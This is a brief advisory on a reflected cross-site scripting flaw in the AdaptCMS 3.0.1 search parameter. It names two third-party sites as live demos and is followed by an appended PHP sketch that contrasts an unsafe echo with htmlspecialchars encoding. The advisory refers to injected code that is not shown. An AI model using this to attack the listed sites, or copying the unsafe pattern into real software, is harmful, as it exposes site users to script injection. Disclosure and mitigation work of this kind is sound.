AdaptCMS 3.0.1 Cross Site Scripting Vulnerability
Author : syst3m_f4ult
Homepage : http://www.adaptcms.com/
Vendor : Adapt CMS
Version : 3.0.1 (probably all versions)
Tested on : Ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
The following page is vulnerable to XSS (Method: POST):
http://localhost/search [data[Search][q] parameter]
Insert the following code inside the search box and hit Enter
Demo:
http://www.solitudeisbliss.com/search/
http://www.insanevisions.com/search/
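
Mitigation sketch for the data[Search][q] issue above. This is an added example, not part of the original advisory and not AdaptCMS code. It assumes the search term is echoed back into the results page; the function names are hypothetical and the sample input is constructed.

```php
<?php
// Added example; not AdaptCMS code. Function names are hypothetical.

// Pull data[Search][q] out of a POST body. Non-string values are rejected:
// PHP turns data[Search][q][]=... into an array, which must not reach output.
function search_term(array $post): string
{
    $q = $post['data']['Search']['q'] ?? '';
    return is_string($q) ? $q : '';
}

// Vulnerable pattern: the term is concatenated into HTML unchanged.
function render_heading_unsafe(string $q): string
{
    return '<h2>Results for: ' . $q . '</h2>';
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES covers both quote styles, so the same encoding is also
// safe inside a quoted attribute such as the search box's value="".
function html_encode(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_heading_safe(string $q): string
{
    return '<h2>Results for: ' . html_encode($q) . '</h2>';
}

function render_search_box_safe(string $q): string
{
    return '<input type="text" name="data[Search][q]" value="' . html_encode($q) . '">';
}

// Constructed sample input: harmless markup standing in for the submitted term.
$post = ['data' => ['Search' => ['q' => '<b>test</b> "quoted"']]];
$q = search_term($post);

echo render_heading_unsafe($q), PHP_EOL;   // markup reaches the page as markup
echo render_heading_safe($q), PHP_EOL;     // markup is displayed as text
echo render_search_box_safe($q), PHP_EOL;  // quotes cannot close the attribute
```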